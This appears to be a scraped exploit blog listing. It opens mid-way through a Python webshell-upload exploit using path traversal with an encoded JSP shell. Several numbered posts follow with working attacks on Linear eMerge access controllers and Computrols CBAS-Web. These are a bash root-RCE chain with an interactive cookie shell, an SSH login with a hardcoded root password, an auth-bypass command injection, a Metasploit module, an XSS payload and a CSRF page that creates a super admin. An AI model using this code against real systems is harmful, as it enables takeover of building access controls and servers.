AwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \ dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \ BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAw \ NzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdT \ AwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDlc \ dTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNk \ RcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAw \ NjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdT \ AwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwND \ lcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAw \ NkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdT \ AwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVc \ dTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwNjlcdTAwNk \ VcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVc \ dTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMj \ lcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAwMjhcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNzVcdTAwNkNc \ dTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAwNzBcdTAwNzJcdTAwNjlcdT \ AwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjlc \ dTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNj \ RcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAw \ NkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAwMEFcdTAwMjBcdTAwMjBcdT \ AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT4KPC9wcmU+CjwvQk9EWT48 \ L0hUTUw+' session = requests.session() #proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' #} def do_authenticate(): global ATLTOKEN auth_form_data = { 'os_username': USERNAME, 'os_password': PASSWORD, 'login': 'Log+in', 'os_destination': '' } r = session.post(LOGINURL, data=auth_form_data, allow_redirects=True, verify=False)#, proxies=proxies) if r.text.find('re-enter your login') != -1: print 'Authentication failed' return 0 elif r.text.find('Sorry, your username and/or password are incorrect') != -1: print 'Authentication failed' return 0 elif r.text.find('Unauthorized') != -1: print 'Unauthorized' return 0 else: print 'Authentication successful' soup = BeautifulSoup(r.text, 'html.parser') ATLTOKEN = soup.find('meta', {'id': 'atlassian-token'})['content'] print 'Atlassian token %s' % (ATLTOKEN) return 1 def do_upload(_pageid): if OS == 'Windows': upload_form_data = SHELLCODE_WINDOWS upload_req_params = { 'pageId': _pageid, 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp', 'size': '3474', 'mimeType': 'text/plain', 'spaceKey': 'isis', 'atl_token': ATLTOKEN, 'name': 'assist' } elif OS == 'Linux': upload_form_data = SHELLCODE_LINUX upload_req_params = { 'pageId': _pageid, 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp', 'size': '3516', 'mimeType': 'text/plain', 'spaceKey': 'isis', 'atl_token': ATLTOKEN, 'name': 'assist' } print 'Uploading webshell' r = session.post(UPLOADURL, params=upload_req_params, data=base64.decodestring(upload_form_data), allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200 and r.text.find('actionErrors') == -1: print 'Webshell uploaded' return 1 else: print 'Error while uploading webshell' return 0 def do_downloadall(_pageid): downloadall_req_params = { 'pageId': _pageid } print 'Moving webshell to the root directory of the web server' r = session.get(DOWNLOADALLURL, params=downloadall_req_params, allow_redirects=True, verify=False)#, proxies=proxies) r = session.get(WEBSHELLURL, allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200: print 'Webshell found' print 'Visit %s' % WEBSHELLURL return 1 else: print 'Webshell not found' return 0 def do_getspaces(): print 'Getting spaces' r = session.get(VIEWSPACESURL, allow_redirects=True, verify=False)#, proxies=proxies) spacelist = re.findall(r'\"key\":\"(\w+)\"', r.text) return spacelist def do_createspace(): print 'Creating space' upload_form_data = json.dumps({ "key": "TST1", "name": "Example space", "description": { "plain": { "value": "This is an example space", "representation": "plain" } }, "metadata": {} }) headers = { 'Content-Type': 'application/json' } r = session.post(VIEWSPACESURL, data=upload_form_data, headers=headers, allow_redirects=True, verify=False)#, proxies=proxies) matched = re.match(".*\"key\":\"(\w+)\".*", r.text) if matched: print 'Space created' return matched.group(1) else: print 'Space not created' return 0 def do_createpage(space): global PAGEID print 'Trying %s space' % (space) r = session.get(CREATEPAGEURL+space, allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200 and r.text.find('ajs-draft-id') != -1: soup = BeautifulSoup(r.text, 'html.parser') pageid = soup.find('meta', {'name': 'ajs-draft-id'})['content'] pageid_pattern = re.compile("^(\d+)$") if pageid_pattern.match(pageid): PAGEID = pageid print 'Page ID created %s' % (pageid) return 1 else: print 'Unexpected Page ID format' return 0 else: print 'Page ID not created' return 0 def main(): if do_authenticate() != 1: exit() if PAGEID != '': if PAGEID == '0': spaces = do_getspaces() for sp in spaces: if do_createpage(sp) == 1: if do_upload(PAGEID) != 1: continue if do_downloadall(PAGEID) != 1: continue else: exit() new_sp = do_createspace() if new_sp != 0: if do_createpage(new_sp) == 1: if do_upload(PAGEID) != 1: exit() if do_downloadall(PAGEID) != 1: exit() exit() else: exit() else: exit() if do_upload(PAGEID) != 1: exit() if do_downloadall(PAGEID) != 1: exit() else: ID = PAGEID_RANGE_START while ID <= PAGEID_RANGE_END: print 'Trying Page Id %d' % (ID) if do_upload(ID) == 1: if do_downloadall(ID) == 1: break ID += 1 if __name__ == "__main__": main()
  9. HireHackking

    eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7255 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC: GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1
  10. HireHackking

    eMerge50P 5000P 4.6.07 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC: #!/bin/bash # # Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07 # Including escalating to root privileges # CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-006 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # This script is tested on macOS 10.13.6 # by Sipke Mellema # # usage: ./sploit.sh http://target # ########################################################################## # # $ ./sploit.sh http://192.168.1.1 # # # . . . . . # . . . . . # | |Linear eMerge50 4.6.07| | # | | | | # | |Remote code executionz| | # | | With priv escalation | | # | | Get yours today | | # | | | | | # | | Boomch | | # . . . . . # . . . . . # # # # [*] Checking connection to the target.. # [V] We can connect to the server # [*] Checking if already infected.. # [V] Target not yet infected.. # [*] Creating custom session file.. # [*] Uploading custom session file.. # [V] Session file active! # [*] Retrieving CSRF token.. # [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9 # [*] Uploading file.. # [V] File successfully uploaded # [*] Writing new config.. # [V] Wrote new config, restarting device # [*] Looks good! Waiting for device to reboot.. # [V] Executing: whoami.. # [V] Username found: root # [*] Cleaning up uploaded files.. # [*] Removing fake backup file.. # [*] Removing shell script.. # [*] Files removed # # [*] If that worked, you can how execute commands via your cookie # [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi # [*] Or type commands below ('quit' to quit) # # root@http://192.168.1.1$ id # uid=0(root) gid=0(root) groups=0(root) # root@http://192.168.1.1$ quit # ########################################################################## RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m' BANNER=" \t . . . . . \t . . . . . \t| |${BLUE}Linear eMerge50 4.6.07${RED}| | \t| |${BLUE} ${RED}| | \t| |${BLUE}Remote code executionz${RED}| | \t| |${BLUE} With priv escalation ${RED}| | \t| |${BLUE} Get yours today ${RED}| | \t| |${BLUE} | ${RED}| | \t| |${BLUE} Boomch ${RED}| | \t . . . . . \t . . . . . ${NC} " printf "\n${RED}${BANNER}\n\n" function echo_green { printf "${GREEN}[*] $@${NC}\n" } function echo_blue { printf "${BLUE}[V] $@${NC}\n" } function echo_red { printf "${RED}[-] $@${NC}\n" } function show_usage { echo -en "Usage: ./sploit.sh " } # check arguments if [ $# -eq 0 ] then echo_red "Incorrect parameters" show_usage exit fi # Define global paramters VULN_HOST=$1 TEST_CMD="whoami" # ========================= Vuln 2: Session ID allows path traversal # Path traversal to session file injected as backup file SESSION_ID="../web/upload/system/backup.upg" function run_remote_shell { # shell is in the context of the lower privileged user called s2user # but the user has sudo rights # ========================= Vuln 5: Webserver runs as root TEST_CMD='' while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo "" done } # ========================= Pre-exploit checks # check connection echo_green "Checking connection to the target.." RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" != "200" ] ; then echo_red "Could not connect to ${VULN_HOST} :(" ; exit fi echo_blue "We can connect to the server" # check already infected echo_green "Checking if already infected.." RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" == "200" ] ; then echo_blue "Target already seems to be infected" SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_blue "Username found: ${SPLOT_USERNAME}" read -p "Try shell directly? (Y/N)" TEST if [ "$TEST" == "Y" ] ; then echo_green "Trying direct shell.." run_remote_shell exit fi else echo_blue "Target not yet infected.." ; fi # ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload # Used to create file with the contents of a valid session file # Session file required a timestamp from < 3600 seconds ago # And a valid (remote) IP address echo_green "Creating custom session file.." # binary session file SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s=" # write session/backup file printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg # write IP MY_IP=`curl -s https://api.ipify.org` printf ${MY_IP} >> backup.upg printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg # replace timestamp python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null # upload session as backup file echo_green "Uploading custom session file.." curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi # check if session file works RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" != "200" ] ; then echo_red "Creating session file didn't seem to work :(" ; exit fi echo_blue "Session file active!" # ========================= Vuln 3: Image upload allows any file contents # We use it to upload a shell script # It will be run as root on startup # get csrf token echo_green "Retrieving CSRF token.." CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft = "(.*)"' | awk -F '"' '{print $2}'` echo_blue "CSRF_TOKEN: $CSRF_TOKEN" if [ -z "$CSRF_TOKEN" ]; then echo_red "Could not get CSRF token :(" exit fi # prepare file # this will run as root echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi" > shell.jpg echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi' >> shell.jpg # upload file echo_green "Uploading file.." RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \ -F "csrft=$CSRF_TOKEN" \ -F "person=31337" \ -F "file=@shell.jpg" \ ${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"` echo_blue $RESULT if [[ ! "$RESULT" =~ "successfully" ]]; then echo_red "Could not upload file :(" exit fi # ========================= Vuln 4: Config allows command injection # Length is limited # Also, no spaces allowed # change config # the file in the config file will be run as root at startup echo_green "Writing new config.." curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp" > /dev/null echo_blue "Wrote new config, restarting device" # restart device RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"` # this is supposed to get returned (device rebooting) if [[ "$RESULT" =~ "could not handle the request" ]]; then echo_green "Looks good! Waiting for device to reboot.." sleep 20 echo_blue "Executing: whoami.." SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_blue "Username found: ${SPLOT_USERNAME}" # cleanup echo_green "Cleaning up uploaded files.." echo_green "Removing fake backup file.." RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_green "Removing shell script.." RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_green "Files removed" # start shell echo "" echo_green "If that worked, you can now execute commands via your cookie" echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi" echo_green "Or type commands below ('quit' to quit)" echo "" run_remote_shell else echo_red "Exploit failed :(" fi exit
  11. HireHackking

    eMerge E3 Access Controller 4.6.07 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7265 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 #!/usr/bin/env python # # ==== # python lineare3_sshroot.py 192.168.1.2 # [+] Connecting to 192.168.1.2 on port 22: Done # [!] Only Linux is supported for ASLR checks. # [*] root@192.168.1.2: # Distro Unknown Unknown # OS: Unknown # Arch: Unknown # Version: 0.0.0 # ASLR: Disabled # Note: Susceptible to ASLR ulimit trick (CVE-2016-3672) # [+] Opening new channel: 'shell': Done # [*] Switching to interactive mode # Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17 # root@imx6slevk:~# id # uid=0(root) gid=0(root) groups=0(root) # root@imx6slevk:~# pwd # /home/root # root@imx6slevk:~# exit # logout # [*] Got EOF while reading in interactive # [*] Closed SSH channel with 192.168.1.2 # ==== from pwn import * if len(sys.argv) < 2: print 'Usage: ./e3.py <ip>\n' sys.exit() ip = sys.argv[1] rshell = ssh('root', ip, password='davestyle', port=22) rshell.interactive()
  12. HireHackking

    CBAS-Web 19.0.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : N/A # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system #!/usr/bin/env python ''' Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit Affected versions: 19.0.0 and below by Sipke Mellema, 2019 Uses two vulnerabilities for executing commands: - An authorization bypass in the auth module (CVE-2019-10853) - A code execution vulnerability in the json.php endpoint (CVE-2019-10854) Example usage: $ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php" ------------==[CBAS Web v19 Remote Command Injection [*] URL: http://192.168.1.250/ [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php [*] Cookie is authenticated [*] Creating Python payload.. [*] Sending Python payload.. [*] Server says: <?php // Base functions for database access // Expects a number of constants to be set. Set settings.php // Only allow local access to the database for security purposes if(defined('WINDOWS') && WINDOWS){ define('MYSQL_HOST', '192.168.1.2'); define('DB_USER', 'wauser'); define('DB_PASS', 'wapwstandard'); /*define('DB_USER', 'root'); define('DB_PASS', 'souper secrit');*/ ... ''' import requests import sys import base64 as b import json def debug_print(msg, level=0): if level == 0: print "[*] %s" % msg if level == 1: print "[-] %s" % msg # Check parameters if len(sys.argv) < 3: print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__ exit(0) print "------------==[CBAS Web v18 Remote Command Injection\n" # Set host, cookie and URL host = sys.argv[1] cookies = {'PHPSESSID': 'comparemetoasummersday'} url = "http://%s/" % host debug_print("URL: %s" % url) # Command to execute # Only use single quotes in cmd pls icmd = sys.argv[2] if '"' in icmd: debug_print("Please don't use double quotes in your command string", level = 1) exit(0) debug_print("Executing: %s" % icmd) # URL for performing auth bypass by setting the auth cookie flag to true auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test" # URL for removing auth flag from cookie (for clean-up) logout_sess_req = "cbas/index.php?m=auth&a=logout" # URL for command injection and session validity checking json_checks_req = "cbas/json.php" # Perform logout def do_logout(): requests.get(url + logout_sess_req, cookies = cookies) # Check if out cookie has the authentication flag def has_auth(): ret = requests.get(url + json_checks_req, cookies = cookies) if ret.text == "Access Forbidden": return False return True # Set auth flag on cookie def set_auth(): requests.get(url + auth_bypass_req, cookies = cookies) # ======================================================= # Perform auth bypass if not authenticated yet if not has_auth(): debug_print("Cookie not yet authenticated") debug_print("Setting auth flag on cookie via auth bypass..") set_auth() # Check if bypass failed if not has_auth(): debug_print("Was not able to perform authorization bypass :(") debug_print("Exploit failed, quitting..", level = 1) exit(0) else: debug_print("Cookie is authenticated") debug_print("Creating Python payload..") # Payload has to be encoded because the server uses the following filtering in exectools.php: # $bad = array("..", "\\", "&", "|", ";", '/', '>', '<'); # So no slashes, etc. This means only two "'layers' of quotes" # Create python code exec code cmd_python = 'import os; os.system("%s")' % icmd # Convert to Python array cmd_array_string = str([ord(x) for x in cmd_python]) # Create command injection string p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string # Base64 encode for p parameter p_encoded = b.b64encode(p_unencoded) # Execute command debug_print("Sending Python payload..") ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded}) # Parse result ret_parsed = json.loads(ret.text) try: metadata = ret_parsed["metadata"] identifier = metadata["identifier"] debug_print("Server says:") print identifier # JSON Parsing error except: debug_print("Error parsing result from server :(", level = 1) # Uncomment if you want the cookie to be removed after use # debug_print("Logging out") # do_logout()
  13. HireHackking

    eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7265 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23 # ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Linear eMerge E3 Access Controller Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in the Linear eMerge E3 Access Controller. The issue is triggered by an unsanitized exec() PHP function allowing arbitrary command execution with root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module ], 'References' => [ [ 'URL', 'https://applied-risk.com/labs/advisories' ], [ 'URL', 'https://www.nortekcontrol.com' ], [ 'CVE', '2019-7256'] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [ ['Linear eMerge E3', { }], ], 'DisclosureDate' => "Oct 29 2019", 'DefaultTarget' => 0 ) ) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"), 'vars_get' => { 'No' => '251', 'door' => '1337' } }) if res.code == 200 and res.to_s =~ /PHP\/5.6.23/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'No' => '251', 'door' => "`"+cmd+"`" } }) unless res fail_with(Failure::Unknown, 'Exploit failed!') end res end def exploit http_send_command(payload.encoded) print_status("Sending #{payload.encoded.length} byte payload...") end end
  14. HireHackking

    CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10847 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system <!-- CSRF Add Super Admin --> <html> <body> <script>history.pushState('', 't00t', 'index.php')</script> <form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST"> <input type="hidden" name="username_" value="Sooper" /> <input type="hidden" name="first" value="Mess" /> <input type="hidden" name="last" value="O'Bradovich" /> <input type="hidden" name="email" value="aa@bb.cc" /> <input type="hidden" name="password_" value="" /> <input type="hidden" name="notes" value="CSRFed" /> <input type="hidden" name="group_id" value="0" /> <input type="hidden" name="role" value="super" /> <input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  15. HireHackking

    CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
